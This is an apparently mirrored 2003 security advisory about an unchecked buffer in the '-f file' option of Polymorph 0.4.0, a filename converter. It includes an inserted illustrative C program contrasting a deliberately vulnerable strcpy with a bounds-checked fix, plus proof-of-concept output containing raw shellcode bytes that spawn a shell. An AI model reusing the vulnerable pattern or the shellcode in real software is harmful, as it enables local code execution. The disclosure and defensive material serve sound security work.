SECURITYVULNS:DOC:4569
May 23, 2003

Bug found in: Polymorph 0.4.0

vulners.com

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

01100011 - code 'security research team'



[01] Description
[02] Vulnerable
[03] Proof of concept
[04] Vendor response

[01] Description

 Polymorph is a filesystem "unixier" (a Win32 -> Unix filename converter).
 When downloading images from Usenet, a lot of filenames are mangled by MS Outlook
 and other, less caring, newsagents.
 There could be files with strange names like C:\\PIX\\HUBBLE\\Eagle\ Nebula\ 0532.JPG
 and this, of course, is unacceptable.
 Polymorph looks in the current working directory and finds strange filenames like this.
 It then renames the file after converting all the characters to lowercase and
 trimming the cruft from the original.
 The previous example turned out to have the name eagle_nebula_0532.jpg, which is
 much more useful.

 Polymorph contains an unchecked buffer in the "-f file" option;
 this can be exploited very simply.
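 The following C program is an added illustration, not Polymorph's source and not the
 advisory's exploit. It reconstructs the bug class described above (a command-line
 argument copied into a fixed-size buffer without a length check) next to a bounds-checked
 replacement, and adds a bounded version of the "unixier" rename logic from the
 description. The buffer size FILE_ARG_MAX, the function names, and the exact
 normalisation rules (strip the directory prefix, lowercase, replace anything outside
 [A-Za-z0-9._-] with '_') are assumptions for this example; the rejection of empty, "."
 and ".." results is a defensive choice for a tool that renames files in place.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical buffer size for the "-f file" argument; Polymorph's real
 * size is not given in the advisory. */
#define FILE_ARG_MAX 64

/* Vulnerable pattern (hypothetical reconstruction of the bug class the
 * advisory describes, not Polymorph's source): the argument's length is
 * never compared with the destination size, so an over-long "-f" value
 * writes past the end of dest. */
void set_file_unchecked(char dest[FILE_ARG_MAX], const char *arg)
{
    strcpy(dest, arg); /* no bound: the classic unchecked buffer */
}

/* Hardened form: measure first, copy only when the argument and its
 * terminator fit. Returns 0 on success, -1 when rejected. */
int set_file_checked(char dest[FILE_ARG_MAX], const char *arg)
{
    size_t len = strlen(arg);
    if (len >= FILE_ARG_MAX)
        return -1;
    memcpy(dest, arg, len + 1);
    return 0;
}

/* Bounded "unixier" after the description above (rules are assumed):
 * drop any DOS or Unix directory prefix, lowercase, and replace anything
 * outside [A-Za-z0-9._-] with '_'. out is always NUL-terminated and at
 * most outsz-1 characters. Returns 0, or -1 if the result would be
 * truncated, empty, "." or "..", all of which are unsafe rename targets. */
int unixify_name(const char *in, char *out, size_t outsz)
{
    const char *base = in, *p;
    size_t n = 0;

    if (outsz == 0)
        return -1;
    for (p = in; *p; p++)          /* basename: text after last separator */
        if (*p == '/' || *p == '\\')
            base = p + 1;
    for (p = base; *p; p++) {
        unsigned char c = (unsigned char)*p;
        if (n + 1 >= outsz) {      /* no room for this char plus the NUL */
            out[n] = '\0';
            return -1;
        }
        if (isalnum(c) || c == '.' || c == '-' || c == '_')
            out[n++] = (char)tolower(c);
        else
            out[n++] = '_';
    }
    out[n] = '\0';
    if (n == 0 || strcmp(out, ".") == 0 || strcmp(out, "..") == 0)
        return -1;
    return 0;
}

/* Small wrappers so results can be checked without printing. */
int file_arg_fits(size_t arg_len)
{
    char arg[512], dest[FILE_ARG_MAX];
    if (arg_len >= sizeof arg) return -1;
    memset(arg, 'A', arg_len);     /* constructed argument of arg_len 'A's */
    arg[arg_len] = '\0';
    return set_file_checked(dest, arg);
}

int unixify_gives(const char *in, const char *expected)
{
    char out[128];
    return unixify_name(in, out, sizeof out) == 0 && strcmp(out, expected) == 0;
}

int unixify_rejects(const char *in, size_t outsz)
{
    char out[128];
    if (outsz > sizeof out) return 0;
    return unixify_name(in, out, outsz) == -1;
}

int main(void)
{
    char out[128];
    /* constructed sample after the advisory's example (single backslashes
     * in the real name; the advisory shows them shell-escaped) */
    const char *sample = "C:\\PIX\\HUBBLE\\Eagle Nebula 0532.JPG";
    if (unixify_name(sample, out, sizeof out) == 0)
        printf("%s -> %s\n", sample, out);
    printf("80-char -f argument accepted: %s\n",
           file_arg_fits(80) == 0 ? "yes" : "no (rejected)");
    return 0;
}
```

 The checked variant fails closed: an argument that does not fit is refused rather than
 truncated, and the normaliser reports truncation instead of silently renaming to a
 shortened name, so a caller can keep the original file untouched in both cases.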

[02] Vulnerable

 Vulnerable and exploitable version, tested on Redhat 8.0:

 -  Polymorph 0.4.0

 Prior versions may also be vulnerable.
 Source can be found at: http://chromebob.com/proj/polymorph.html

[03] Proof of concept

 [demz@lab polymorph-0.4.0]$ ./c-polymorph

 Polymorph 0.4.0 local exploit
 ---------------------------------------- demz @ c-code.net --
 polymorph had trouble converting

                              1À1Û1É°FÍ€1ÀPhn/shh//bi‰ãPS‰á™°
          Í€1À°ÍÁ% to

                               1À1Û1É°fÍ€1Àphn/shh//bi‰ãps‰á™°

          Í€1À°Í                   ðóÿ¿...

 the file is now possibly corrupt
 sh-2.05b$

 A proof of concept exploit can be found at:
 http://www.c-code.net/Releases/Exploits/c-polymorph.c

[04] Vendor response

 The vendor has been informed.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (GNU/Linux)

iD8DBQE+zTzZ8ToiGqnwMzARAphBAJ9L+MOY5R5arOeb1slTXeNgYAgwsgCcD8od
IwAUN0zzl8ZhkfZN5judNNY=
=oc09
-----END PGP SIGNATURE-----